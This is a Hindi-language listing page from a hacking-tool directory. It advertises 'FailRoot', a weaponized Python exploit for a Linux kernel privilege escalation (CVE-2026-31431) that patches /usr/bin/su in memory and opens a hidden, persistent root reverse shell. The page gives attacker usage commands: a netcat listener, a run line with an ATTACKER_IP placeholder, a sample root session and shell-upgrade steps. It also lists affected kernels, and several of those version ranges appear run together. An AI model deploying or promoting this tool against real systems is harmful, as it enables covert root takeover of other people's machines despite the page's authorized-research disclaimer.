Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-31431-REVSHELL — हथियारबंद Python एक्सप्लॉइट CVE-2026-31431 के लिए, Linux कर्नेल विशेषाधिकार वृद्धि को एक डेमॉनाइज़्ड रूट रिवर्स शेल के साथ जोड़ता है, जिसमें पूर्ण PTY शामिल है, और /usr/bin/su को मेमोरी में पैच करता है। | Kitploit
उपकरण/GitHubGitHub/danimrtzp/cve-2026-31431-revshell
विशेषाधिकार वृद्धिशोषण फ्रेमवर्कभेद्यता विश्लेषणशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
danimrtzp/cve-2026-31431-revshell

CVE-2026-31431-REVSHELL

हथियारबंद Python एक्सप्लॉइट CVE-2026-31431 के लिए, Linux कर्नेल विशेषाधिकार वृद्धि को एक डेमॉनाइज़्ड रूट रिवर्स शेल के साथ जोड़ता है, जिसमें पूर्ण PTY शामिल है, और /usr/bin/su को मेमोरी में पैच करता है।

रिपॉजिटरी देखें
195 महीने पहलेअभी तक समीक्षित नहीं


  █▀▀ ▄▀█ █ █   █▀█ █▀█ █▀█ ▀█▀
  █▀░ █▀█ █ █▄▄ █▀▄ █▄█ █▄█ ░█░

  CVE-2026-31431  •  Linux Kernel LPE  →  Root Reverse Shell

अवलोकन

FailRoot एक हथियारबंद एक्सप्लॉइट है CVE-2026-31431 के लिए — लिनक्स कर्नेल के crypto: algif_aead सबसिस्टम में एक आउट-ऑफ-बाउंड राइट।

यह विशेषाधिकार वृद्धि को पूर्ण PTY के साथ डेमॉनाइज़्ड रूट रिवर्स शेल से जोड़ता है:

AF_ALG + splice()  →  4-बाइट पेज-कैश राइट  →  /usr/bin/su पैच  →  root

पूरा एक्सप्लॉइट एक ही फ़ाइल में समाहित है। कोई कंपाइलेशन नहीं। कोई बाहरी निर्भरता नहीं। डिस्क पर कोई निशान नहीं — su बाइनरी केवल मेमोरी में पैच की जाती है।


यह क्या करता है

  1. तुरंत डेमॉनाइज़ होता है — डबल-फोर्क, टर्मिनल से अलग होता है, तुरंत प्रॉम्प्ट लौटाता है
  2. कर्नेल मॉड्यूल लोड करता है — algif_aead + authencesn कई फ़ॉलबैक रणनीतियों के माध्यम से
  3. CVE-2026-31431 का शोषण करता है — /usr/bin/su पेज कैश में 4 नियंत्रित बाइट्स लिखता है
  4. रूट PTY रिवर्स शेल स्पॉन करता है — pty.spawn("/usr/bin/su") → पूर्णतः इंटरैक्टिव रूट TTY

रिवर्स शेल टर्मिनल बंद होने पर भी बना रहता है (SIGHUP अनदेखा किया जाता है), टारगेट पर शून्य आउटपुट दिखाता है, और 3 मिनट तक रीट्राय के साथ कनेक्ट होता है।


उपयोग

# हमलावर — लिसनर शुरू करें:
nc -lvnp 4444

# टारगेट — एक्सप्लॉइट चलाएँ (कुछ भी नहीं दिखेगा, यह तुरंत डेमॉनाइज़ हो जाता है):
python3 exploit.py <ATTACKER_IP> 4444
attacker ~ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.100] from [192.168.1.50] 50234

root@victim:~# id
uid=0(root) gid=0(root) groups=0(root)

TTY अपग्रेड (हमलावर की ओर से, शेल के अंदर)

Ctrl+Z
stty raw -echo; fg
reset
export TERM=xterm-256color
export SHELL=/bin/bash

प्रभावित कर्नेल

सेतक (अनन्य)
4.145.10.254
5.115.15.204
5.166.1.170
6.26.6.137
6.76.12.85
6.136.18.22
6.196.19.12
7.0rc1–rc6

आवश्यकताएँ

  • Python >= 3.10 (os.splice())
  • /usr/bin/su तक पढ़ने की पहुँच (सभी डिस्ट्रो पर वर्ल्ड-रीडेबल)
  • कर्नेल मॉड्यूल algif_aead और authencesn उपलब्ध हों
  • कोई sudo आवश्यक नहीं

लेखक

danimrtzp


अस्वीकरण

केवल अधिकृत सुरक्षा अनुसंधान और शिक्षा के लिए। दुरुपयोग अवैध है।

टूल डाउनलोड करें